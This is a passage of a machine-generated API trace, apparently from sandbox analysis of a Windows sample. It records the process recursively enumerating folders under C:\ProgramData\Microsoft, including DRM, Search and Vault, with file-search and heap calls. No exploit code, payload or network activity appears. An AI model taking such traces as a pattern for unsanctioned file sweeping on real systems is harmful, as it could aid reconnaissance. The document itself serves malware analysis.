out: lpFindFileData=0x2b4ec64) returned 1 [0139.735] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.735] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32968 [0139.735] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 1 [0139.735] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 1 [0139.735] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0 [0139.735] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.735] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.735] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.736] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.736] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.736] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.736] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.736] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.736] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.736] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.736] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0 [0139.736] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0139.736] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.736] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0139.736] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.736] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.736] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0139.736] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.736] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.737] FindNextFileW (in: hFindFile=0xa32868, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.737] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.737] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.737] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0139.737] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.738] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.738] FindNextFileW (in: hFindFile=0xa32868, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.738] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.738] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.738] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.738] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328e8 [0139.738] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.739] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0139.739] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.739] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.739] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0139.739] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.739] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.740] FindNextFileW (in: hFindFile=0xa32868, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.740] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.740] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328e8 [0139.741] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.741] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0139.741] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.741] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.741] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0139.741] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.741] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.742] FindNextFileW (in: hFindFile=0xa32868, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.742] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.742] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.742] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.743] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328e8 [0139.743] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.743] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.743] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32928 [0139.743] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.743] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0 [0139.743] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0139.743] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.743] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0139.744] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.744] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.744] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0139.744] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.744] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.745] FindNextFileW (in: hFindFile=0xa32868, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.745] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.745] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.745] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.745] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.745] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.746] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.746] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.746] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.746] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.747] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328e8 [0139.747] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.747] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.747] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.747] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.749] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.749] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328e8 [0139.750] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.750] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.750] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.750] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.751] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.752] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328e8 [0139.752] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.799] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa329a8 [0139.800] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.800] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.800] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.800] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa329a8 [0139.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa329e8 [0139.802] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0139.802] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.802] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa329e8 [0139.803] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0139.804] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.804] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.804] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.805] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.805] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa329a8 [0139.805] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.806] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.806] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.807] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa329a8 [0139.808] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.808] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.808] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa329a8 [0139.808] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.808] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.808] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa329a8 [0139.809] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.809] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa329a8 [0139.810] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.810] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.810] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.810] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa329a8 [0139.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa329e8 [0139.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ba8 [0139.935] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Config\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32be8 [0139.935] FindClose (in: hFindFile=0xa32be8 | out: hFindFile=0xa32be8) returned 1 [0139.936] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0139.936] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32be8 [0139.936] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32c28 [0139.936] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0139.936] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0139.936] FindClose (in: hFindFile=0xa32be8 | out: hFindFile=0xa32be8) returned 1 [0139.936] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0139.936] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32be8 [0139.936] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32c28 [0139.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32c68 [0139.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32ca8 [0139.991] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0139.991] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33c00d0 | out: hHeap=0x20f0000) returned 1 [0139.991] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0139.991] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33b00c8 | out: hHeap=0x20f0000) returned 1 [0139.992] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32c68 [0139.992] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0139.992] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33b00c8 | out: hHeap=0x20f0000) returned 1 [0139.993] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32c68 [0139.993] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0139.994] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33b00c8 | out: hHeap=0x20f0000) returned 1 [0139.994] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0139.994] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0139.994] FindClose (in: hFindFile=0xa32be8 | out: hFindFile=0xa32be8) returned 1 [0139.994] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0139.994] FindClose (in: hFindFile=0xa32ba8 | out: hFindFile=0xa32ba8) returned 1 [0139.995] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0139.997] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0139.997] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.998] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa329e8 [0139.999] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0139.999] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.999] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.999] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.999] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.000] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa329a8 [0140.006] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0140.008] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.008] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.008] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.009] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.009] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.010] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.010] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\AIT\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa329a8 [0140.011] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0140.011] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.011] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa329a8 [0140.011] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0140.012] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa329a8 [0140.013] FindFirstFileW (in: 